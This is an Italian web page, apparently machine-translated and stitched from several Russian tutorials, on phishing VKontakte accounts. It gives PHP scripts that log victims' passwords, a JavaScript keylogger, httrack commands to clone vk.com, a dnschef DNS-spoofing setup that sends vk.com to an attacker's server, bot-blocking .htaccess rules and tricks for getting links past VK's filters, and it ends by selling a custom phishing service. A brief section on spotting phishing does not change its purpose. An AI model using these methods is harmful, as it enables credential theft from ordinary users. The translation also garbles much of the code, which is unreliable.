Come configurare smartphone e PC. Portale informativo
  • casa
  • Windows Phone
  • Phishing account Vkontakte su Kali Linux. Hackerare una pagina VKontakte con un metodo di phishing più avanzato

Phishing account Vkontakte su Kali Linux. Hackerare una pagina VKontakte con un metodo di phishing più avanzato

Alcuni anni fa, il metodo di phishing era molto popolare, ma ora i servizi hanno imparato a rilevarlo, trovano e bloccano le pagine false. Pertanto, esiste un metodo di phishing più avanzato.

Oggi molte persone usano i social network, ogni giorno le persone cercano di hackerare l'account Vkontakte di qualcuno, mail.ru, gmail e altri servizi e lo fanno gratuitamente. Il più delle volte, le persone sono alla ricerca di un'app magica per hackerare Vkontakte, ma ti mostreremo qualcos'altro. Questo è phishing. Ma in questo articolo (a differenza del precedente), ne prenderemo in considerazione una versione alternativa.

Rinominare il file index.html nel file vk.jpg, questo è necessario per confondere il sistema di sicurezza Vkontakte;

Crea un file vuoto chiamato security.php, aprilo nel blocco note, inserisci il seguente codice

$ id = $ _GET ["codice"];

if ($ id == "conferma email") (

$ mioFile = "vk.jpg";

$ fh = fopen ($ mioFile, "r");

$ theData = fread ($ fh, 500000); fchiudi ($ fh);

$ mioFile1 = "conferma.jpg";

$ fh1 = fopen ($ mioFile1, "r");

$ theData1 = fread ($ fh1, 500000);

echo $ theData1; )

e salvalo accanto a vk.jpg;

Crea un file confirm.jpg, aprilo anche nel blocco note e inserisci la seguente riga al suo interno:

grazie per aver confermato il tuo indirizzo email.

Salva;

Assicurati di avere i file di cui hai bisogno

e una cartella con tutti gli script Vkontakte, senza di essi la tua pagina falsa verrà visualizzata in modo errato;

Carica questi file sul tuo host web;

Questo metodo è adatto anche se la vittima accede da un dispositivo Android. E con un set di script, puoi hackerare un gran numero di account su Vkontakte. Oltre ai costi di hosting, questo è un modo gratuito per ottenere una password.

Questo è solo un metodo per superare i sistemi di sicurezza di un social network o di un servizio di posta elettronica. Ma oggi, per hackerare Vkontakte, devi conoscere molti di questi metodi. I meccanismi anti-phishing migliorano ogni giorno e i proprietari dei servizi stringono sempre di più le viti, senza lasciare scappatoie per gli hacker. Ma la forza del metodo di hacking sta proprio in un altro. Vale a dire, nell'abile manipolazione delle persone, la capacità di identificare e utilizzare le loro debolezze. Scrivere una buona prima pagina non è nemmeno metà della battaglia, perché se non si hanno sufficienti competenze di ingegneria sociale, semplicemente non ha senso farlo.

Saluti, abitanti del forum! Oggi parleremo di phishing Vkontakte. Innanzitutto ci tengo a dire che l'articolo cita alcuni servizi, non consideratelo una pubblicità. L'articolo è stato scritto a scopo informativo e non sto incoraggiando nessuno a intraprendere le azioni descritte nell'articolo.

Come sai, il phishing VK era molto popolare, ma dopo l'aggiornamento di VKontakte, la politica di sicurezza ha iniziato a esaurirsi. É davvero? Dopotutto, nulla è fermo e con la nuova politica di sicurezza sono arrivati ​​nuovi metodi di phishing.
In questo articolo ti parlerò un po' dei "problemi" del sito VK fish e delle loro soluzioni usando l'esempio di un sito a lungo fuso in uno pubblico. (I sorgenti possono essere scaricati qui: Ya.Disk

Qual è la prima cosa che salta all'occhio quando apri un sito del genere?

  • Aspetto sospetto: il sito sembra una vecchia versione mobile di VK, il cambio di lingua non funziona, i vecchi caratteri e un logo pixelato suggeriscono immediatamente che siamo su un sito dannoso.
  • Mancanza di una versione desktop del sito: sì, capisco che l'80% del traffico VK proviene da dispositivi mobili, ma comunque devi essere pronto a tutto, soprattutto se sei impegnato in hacking individuale.
  • Tali siti vengono immediatamente contrassegnati dai browser come "fraudolenti": il fatto è che il browser prima di tutto guarda al certificato SSL o alla sua assenza, e così via. i phisher distribuiscono principalmente siti fish su hosting gratuito, quindi non è possibile ottenere almeno un certificato SSL DV lì. i siti sono contrassegnati come "fraudolenti" e quindi l'account di hosting viene bannato.
  • Completa mancanza di convalida dei dati: tutto ciò che ho visto in tali script è fondamentalmente un modulo con i campi "login", "password", un pulsante e una registrazione di questa roba in un blocco note. Nessun controllo di convalida, campi vuoti o BadRequest ... Non sto nemmeno parlando di lavorare con account 2FA. Massimo: una richiesta all'API VK per ricevere un token.
  • Invio di messaggi contenente un collegamento a un sito di phishing: durante l'invio di messaggi, il testo era qualcosa del genere: "Oh Dio, hai vinto il concorso di repost, segui il collegamento

    Devi essere registrato per vedere i link.

    E ottieni $ 100.500. "Beh, devi ammettere che sembra stupido. Ma sì, questo è ancora in corso ... sono rimaste poche persone così ingenue, e per lo più bambini.

  • Accorciare i link: per consentire a VK di saltare i collegamenti ai siti di pesca, è stato necessario eseguire un reindirizzamento + una riduzione, di conseguenza, il collegamento si è rivelato simile

    Devi essere registrato per vedere i link.

    Questo ha solo rovinato l'aspetto del messaggio.

Ora voglio soffermarmi su alcuni punti in modo più dettagliato, ovvero l'accorciamento dei collegamenti e l'ottenimento di un certificato SSL.
Accorciare i link
Come ho fatto quando stavo appena imparando il phishing: ho creato un sito su uCoz, nell'editor di pagine HTML ho aggiunto uno script che reindirizzava a un sito fish. Quindi ho guidato l'URL del sito in vk.cc e ho ottenuto un collegamento già pronto, che VK ha passato. Come evitare queste sciocchezze? È molto semplice. Ci sono due modi:
  1. Non accorceremo i collegamenti da vk.cc, ma imbroglieremo un po' con uCoz. (Se stai usando un sito di sondaggi come un sito di sondaggi, questo è generalmente fantastico)
  2. Ottieni un certificato SSL per il tuo dominio.

Spoiler: frode con uCoz

Creeremo qualsiasi sito con un nome che corrisponda al tema del sito di posa

Andiamo nella scheda Moduli e creiamo una pagina del sito web

Chiamiamolo in qualche modo, lo chiamerò "test", se hai un site-laying come un voto, puoi nominare la pagina "golos-za-ivana-pupkina"

Ora andiamo al nostro sito, quindi alla scheda "test" che abbiamo appena creato e copiamo l'URL da qualche parte

Andiamo alla sezione Design => Editor => Site Pages... e tra

inserire le seguenti righe:


Di conseguenza, seguendo il link

Devi essere registrato per vedere i link.

Saremo trasferiti al sito di cui abbiamo bisogno. Ora non è necessario abbreviare tali collegamenti tramite vk.cc. VK li salterà senza problemi e durante l'invio ci priveremo delle domande del destinatario "Oh, una sorta di collegamento sospetto ... non è sicuramente una bufala?"


Ottenere un certificato SSL
Come ho detto, è necessario un certificato SSL in modo che browser e antivirus non segnalino il nostro sito di phishing come "fraudolente". Inoltre, i collegamenti a un sito con SSL vengono saltati da VK, il che significa che le manipolazioni sopra descritte non saranno necessarie, possiamo semplicemente eliminare il collegamento nella sua forma originale.

Spoiler: Otteniamo un certificato SSL

Al momento, ci sono molti siti di hosting che lavorano con le autorità di certificazione. La soluzione più semplice al problema con SSL è distribuire i tuoi siti, proprio su tale hosting. Il loro pannello di controllo ha già una scheda con la gestione SSL, dove puoi ordinare un nuovo certificato, installarne uno tuo o gestire i certificati esistenti.

Inoltre, per ridurre la probabilità di bloccare un sito contrassegnato come fraudolento, puoi prescrivere nel file .htaccess un divieto di indicizzazione da parte dei bot dei motori di ricerca.

Spoiler: Cosa aggiungere a .htaccess

SetEnvIfNoCase User-Agent "^ Googlebot" search_bot
SetEnvIfNoCase User-Agent "^ Yandex" search_bot
SetEnvIfNoCase User-Agent "^ Yahoo" search_bot
SetEnvIfNoCase User-Agent "^ Aport" search_bot
SetEnvIfNoCase User-Agent "^ msnbot" search_bot
SetEnvIfNoCase User-Agent "^ spider" search_bot
SetEnvIfNoCase User-Agent "^ Robot" search_bot
SetEnvIfNoCase User-Agent "^ php" search_bot
SetEnvIfNoCase User-Agent "^ Mail" search_bot
SetEnvIfNoCase User-Agent "^ bot" search_bot
SetEnvIfNoCase User-Agent "^ igdeSpyder" search_bot
SetEnvIfNoCase User-Agent "^ Snapbot" search_bot
SetEnvIfNoCase User-Agent "^ WordPress" search_bot
Agente utente SetEnvIfNoCase "^ BlogPulseLive" search_bot
SetEnvIfNoCase User-Agent "^ Parser" search_bot


Bene, per ora questo è tutto. Ho ancora molte informazioni su VK, quindi se qualcuno vuole discutere di phishing VK, fare una domanda o qualsiasi altra cosa, per favore vai alla LAN del forum. Sempre aperto a nuove idee. Spero che queste informazioni ti siano state utili ;)

In questo articolo, il comando AiutoU, descriverà in dettaglio lo schema di phishing per gli account di un popolare social network In contatto con.

Quindi andiamo.

Per lavoro abbiamo bisogno Kali Linux la versione più recente, che è al momento, oltre alla conoscenza a riguardo, l'abbiamo scritta in precedenza. Ma per il sito VK, descriveremo tutto individualmente.

Quindi, prendiamo il sito: vk.com. In questa fase, non tutto è difficile, puoi semplicemente copiare. Ma solo una cosa, se copi solo il codice sorgente della pagina, otteniamo tale "sporco":

Abbastanza impresentabile...

Cloneremo il sito, o meglio la sua pagina di benvenuto. Per questo useremo. Infatti questo programma è unico, può copiare sia l'intero sito che le sue singole parti.

Il modo più semplice per eseguire questo programma sarebbe simile a questo:

Httrack vk.com -O / var / www / html

Ma per VK sconsigliamo di farlo, perché copiare l'intero VK, non l'idea più intelligente. Questo viene spesso fatto su siti più piccoli per un'analisi completa della struttura di tutte le cartelle e file. Ma in questa fase, agiremo secondo uno scenario diverso.

Innanzitutto, è necessario utilizzare un parametro per inserire un agente utente.

Di conseguenza, utilizzeremo il parametro:

F Mozilla / 5.0 (Windows NT 6.1) ApleWebKit / 537.36 (KHTML, come Gecko) Chrome / 41.0.228.0 Safari / 537.36

Httrack https://vk.com -r2 -F Mozilla / 5.0 (Windows NT 6.1) AppleWebKit / 537.36 (KHTML, come Gecko) Chrome / 41.0.228.0 Safari / 537.36 -O "/var/www/html/vk.com "

Dopo di che vedremo:

Il sito verrà copiato. Nella cartella vk.com ci saranno diversi file che ho creato, puoi eliminarli e lasciare solo una cartella vk.com

Elimina, sposta i file da una sottocartella vk.com nella cartella vk.com più in alto, e quindi non avremo il percorso nella barra degli indirizzi: localhost / vk.com / vk.com

Dopo aver manipolato i file, l'indirizzo sarà: localhost / vk.com

Tutto è chiaro con la versione web. Ma se provi a copiare la versione mobile di VKontakte ( m.vk.com), ci saranno delle difficoltà, ci javascript verifica la validità dell'indirizzo e impedisce il caricamento della pagina. Ma anche questo ha la sua vulnerabilità.

Il comando sarà il seguente:

Httrack https://m.vk.com -r2 -F "Mozilla / 5.0 (Linux; U; Android 4.0.3; ru-ru; LG-L160L Build / IML74K) AppleWebkit / 999 + (KHTML, come Gecko) Safari /999.9 "-O" /var/www/html/mvk/"

Quando il sito viene copiato e si tenta di accedervi, non ne verrà fuori nulla, quindi è necessario eseguire il seguente comando:

Nano /var/www/html/mvk/m.vk.com/index.html

Seleziona la riga evidenziata nello screenshot ed eliminala.

E il sito funziona benissimo.

Quindi, abbiamo siti identici all'originale. Ma i log non vengono salvati da nessuna parte e non saremo in grado di vedere chi ha martellato cosa nei campi, quindi iniziamo a programmare web. Implementeremo nel nostro sito keylogger, lo scriveremo su php e javascript.

Crea 3 file keylogger.php, keylogger.js e keylog.txt

V keylogger.php introduciamo:

$ chiave = $ _ POST ["chiave"];
$ logfile = "keylog.txt";
$ fp = fopen ($ file di registro, "a");
fwrite ($ fp, $ chiave);
fchiudi ($ fp);
?>

V keyloger.js introduciamo:

Document.onkeypres = funcion (evt) (evt = evt || window.evnt key = String.fromCharode (evt.charode) if (key) (var http = new XMLHtpRequest (); var parm = encodeURI (key) http.open ("POST", "keylogger.php", true); http.setReqestHeder ("Contnt-type", "aplication / x-ww-form-urlenoded"); http.send ("key =" + parm);) )

nel nostro index.php devi aggiungere la riga:

Fatto, abbiamo finito keylogger.

Ora iniziamo a modificare index.php: cercando la linea " Accesso"E cerca il parametro onclick = 'top.showBox'(cambia l'indirizzo in https://vk.com)

Dopodiché, quando premi il pulsante Accesso l'utente sarà indirizzato al sito ufficiale In contatto con.

Entriamo attraverso SSH Su VPS.

# wget htps: //thesprwl.org/media/projcts/dnscef-0.3.zip # unzip dnscef-0.3.zip # cd dnshef * # chod 755 * .py

La soluzione migliore sarebbe che è meglio inserire i seguenti parametri qui:

# pi installa dnslib # pi installa IPy

Crea un file: host.txt

In esso scriviamo quanto segue:

(URL sito, nel nostro caso vk.com = IP_YOUR_VPS)

Prescrivendo il seguente comando, eseguiremo tutto:

./dnschf.py -i 0.0.0.0 --logfle = log.txt --file = hosts.txt

Fatto, tuo DNS funziona con successo. Ci restituisce i nostri indirizzi.

Questo è tutto, speriamo che questo articolo ti sia stato utile.

Cordiali saluti, squadra AiutoU.

Negazione di responsabilità: Questo articolo è stato scritto solo a scopo didattico. L'autore o l'editore non ha pubblicato questo articolo per scopi dannosi. Se i lettori desiderano utilizzare le informazioni per guadagno personale, l'autore e l'editore non sono responsabili per eventuali danni o danni causati.

In questo articolo ti dirò cos'è il phishing di VKontakte. Come non farsi beccare su un sito di phishing e non bruciare le proprie credenziali. Darò anche un esempio di creazione di un sito del genere.

Che cos'è il phishing?

In generale, la parola pesca è tradotta come pesca. Il phishing è uno spoofing di un sito Web in cui gli utenti inseriscono le proprie credenziali, come "login" e "password", e quindi reindirizzano al sito Web ufficiale in modo che non vi siano sospetti. Una persona cattiva "ravanello" riconosce le tue credenziali e può entrare nel sito con il tuo nome utente.

Sii attento

Come puoi scivolare su un sito del genere, ci sono un paio di esempi.

  1. Su qualsiasi risorsa potrebbe esserci un link che dice: "aggiungimi come amico e ottieni 10 voti VKontakte per questo". D'accordo, allettante? La vittima segue questo link, arriva a un sito che sembra non essere diverso dal sito VKontakte, inserisce un "login" e una "password". Sale sulla sua pagina, non c'erano più voti. Pensa a lungo e alla fine segna su questo argomento, e i dati dell'account sono già al "ravanello".
  2. La tua ragazza o il tuo ragazzo ti danno un link al sito, con il pretesto tipo Gatto =) Tu, senza pensarci due volte, segui il link, inserisci il tuo "login" e "password". E il tuo altro significativo ora conosce le tue credenziali e sarà in grado di vedere con chi stai scrivendo =)

E ci sono molte altre opzioni su come attirare una vittima in un sito del genere.

Vedi dove stai andando, se sei attualmente in un contatto e ti viene dato un link, ci clicchi sopra, vedi la pagina di autorizzazione, dovresti avere subito un sospetto. Presta attenzione all'indirizzo del sito web. Diciamo VKontakte, il suo indirizzo: vk.com o vkontakte.ru. Non molte persone riescono a ricordare nomi di dominio di siti Web lunghi, sono i più facili da falsificare. Penso che per questo motivo il social network VKontakte sia passato a un indirizzo di dominio così breve che sarebbe più difficile falsificarlo. Se vedi l'indirizzo vk.org, allora non vedrai davvero un problema, se scrivi qualcosa dopo di esso, ad esempio: quindi, in generale, un indirizzo come indirizzo. Bene, se ti viene chiesto di inserire una password da qualche parte, controlla attentamente l'indirizzo del dominio.

Creazione di un sito di phishing

Questo materiale viene fornito esclusivamente a scopo informativo e non per violare i conti dei tuoi conoscenti e amici, ricorda inoltre che si tratta di un procedimento penale.

E quindi darò un esempio di creazione di un sito di phishing per il social network VKontakte.

Apri qualsiasi browser, vai su vk.com,

Nome file: index.html

Tipo di file: pagina Web, completamente con immagini. Premiamo il pulsante, Salva.

Ora è necessario creare uno script che trasmetterà i dati inseriti nel campo login e password. Chiamiamolo icq.php

Apri il blocco note e incolla lì questo codice.

$ Accesso = $ _POST; // Accesso vittima

$ Passa = $ _POST ['zena']; // Password della vittima

$ log = fopen (“ups.php”, ”a +”); // le password delle vittime saranno qui

fwrite ($ log, "
$ Accesso: $ Passa \ n ”); // scrivi su ups.php

fclose ($ log); // close ups.php

eco " ”; // reindirizza la vittima a http://vk.com

Chiudi e salva come icq.php

Apri il file index.html nel blocco note. Apri la ricerca (ctrl + f) e invio

Troverà la riga:

Lo cambiamo in questo:

Cambia in questo:

Guardiamo un po' più in basso e troviamo la riga:

Cambia in questo:

Salva index.html e ti ritroverai con due file e una cartella. Quindi l'intera cosa dovrà essere caricata sul tuo hosting. Puoi usare questo https://beget.com per un mese gratuitamente, puoi acquistarlo per un mese, solo 150 rubli. Penso che tu sappia come farlo, in caso contrario, fai una domanda nei commenti.

Quando la vittima entra nella tua pagina di phishing, inserisce "login" e "password", verrà creato un altro file sul tuo hosting, ups.php al suo interno e gli account verranno archiviati.

Una storia su come caricare tutto sull'hosting

Produzione

In questo articolo hai imparato a proteggerti e a non farti scoprire da un sito di phishing. Come creare un sito di phishing. Puoi scaricare il phishing già pronto per VKontakte di seguito a scopo informativo.

(adsbygoogle = window.adsbygoogle ||) .push (());

Scarica il phishing già pronto per VKontakte.

Amici, partecipate a un sondaggio su quali altri attacchi di phishing possono essere effettuati e se sono necessari nel nostro gruppo: https: //vk.com/27sysday

A causa del gran numero di richieste, ho deciso di creare un servizio di personalizzazione.

Ciò che è necessario

  1. Devi registrarti https://beget.com
  2. Skype me spbskull.
  3. Dimmi il tuo nome utente e password.
  4. Ricarica il saldo del telefono per 1000 rubli (telefono te lo dico su Skype).
  5. Un'ora dopo il pagamento, riceverai una soluzione già pronta.

Principali articoli correlati